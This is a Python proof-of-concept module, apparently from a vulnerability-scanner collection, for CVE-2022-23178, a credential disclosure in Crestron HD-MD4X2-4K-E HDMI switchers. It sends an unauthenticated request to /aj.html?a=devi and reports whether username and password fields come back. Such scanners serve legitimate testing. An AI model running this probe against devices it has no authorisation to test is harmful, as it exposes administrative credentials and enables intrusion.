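import requests


# Vuln Base Info
def info():
    """Return the static metadata record describing CVE-2022-23178.

    The dictionary is rebuilt on every call, so callers may mutate the
    returned object without affecting later calls.
    """
    return {
        "author": "cckuailong",
        "name": '''Crestron Device - Credentials Disclosure''',
        "description": '''An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.''',
        "severity": "critical",
        "references": [
            "https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device",
            "https://nvd.nist.gov/vuln/detail/CVE-2022-23178",
            "https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "cvss-score": "9.8",
            "cve-id": "CVE-2022-23178",
            "cwe-id": "CWE-287"
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2022", "crestron", "disclosure"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Report whether ``url`` looks like an affected product.

    No vendor or model check is implemented: the function returns True for
    every input, so it does not narrow the set of hosts that poc() probes.
    """
    return True


# Proof of Concept
def poc(url):
    """Check whether the device web interface discloses credentials.

    Sends one unauthenticated GET for ``/aj.html?a=devi`` and reports a hit
    when the answer is HTTP 200 and its body contains both the ``"uname":``
    and ``"upassword":`` JSON keys. Only the presence of the keys is tested;
    the disclosed values are neither parsed nor stored in the result.

    Args:
        url: Target host or base URL; normalised by format_url().

    Returns:
        A dict that always carries ``"success"``. On a hit it also carries
        ``"info"`` (the info() record) and ``"payload"`` (the probed URL).
    """
    # Start from a negative verdict so that a reachable but non-matching
    # target still yields a "success" key instead of an empty dict.
    result = {"success": False}
    try:
        url = format_url(url)
        path = '/aj.html?a=devi'
        # verify=False: certificate validation is disabled, so the peer's
        # identity is not authenticated over HTTPS and a hit only says that
        # whatever answered at this address returned the marker keys.
        # allow_redirects=False: a redirect (for example to a login page)
        # is not followed and therefore never counts as a finding.
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and '"uname":' in resp.text and '"upassword":' in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except Exception:
        # Best-effort probe: network, TLS and input errors all mean "not
        # confirmed". KeyboardInterrupt and SystemExit are deliberately not
        # caught here, so an operator can still stop a long scan.
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Run the same non-destructive check as poc() and return its result."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target string into a base URL without a trailing slash.

    Surrounding whitespace is stripped, ``http://`` is prepended when the
    string starts with neither ``http://`` nor ``https://``, and trailing
    ``/`` characters are removed.
    """
    url = url.strip()
    # Scheme-less targets default to plain HTTP; pass an explicit https://
    # URL when the management interface is only served over TLS.
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    return url.rstrip('/')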